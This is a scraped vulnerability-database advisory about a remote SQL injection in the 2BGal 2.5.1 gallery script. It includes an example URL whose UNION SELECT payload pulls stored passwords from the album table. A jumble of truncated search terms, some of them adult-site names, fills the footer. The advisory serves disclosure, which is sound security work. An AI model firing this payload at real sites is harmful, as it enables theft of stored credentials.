about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , 2BGal Remote SQL Injection Vulnerability


Title 2BGal Remote SQL Injection Vulnerability
Published 2004-12-22-12:00AM
Updated 2005-01-07-04:45PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to zib zib <zibelette@aol.com>.
Vulnerable  2BGal 2BGal 2.5.1
Not Vulnerable  2BGal 2BGal 2.5.2
Code   The following example is available:

http://www.example.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 14:34:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.vkonta www.708125 708125.cn Photokorn+ antarvasna Www . wor Hello,+nic Free downl news for c kaht Namethasex msqj.5d6d. sexgalleri IS A1 search/exp ho8jin.ycc Hinata get arabfat pa redhat lin www.lixiao 12580.178z www.bollyw Video xl p local root WWW.SEXY.C m...52Frea www.xxxpor dragon fab vbullieten artis indo open ssh 2 /index.php china.tooc www.hengk. www.maopw. www.hzhedu www.49game Www.very v bosclassif news for c www.sex me douwo.net play boy p t868t apache dir horde www.ppmar. apache 1.3 Reggaetom 69.59.20.4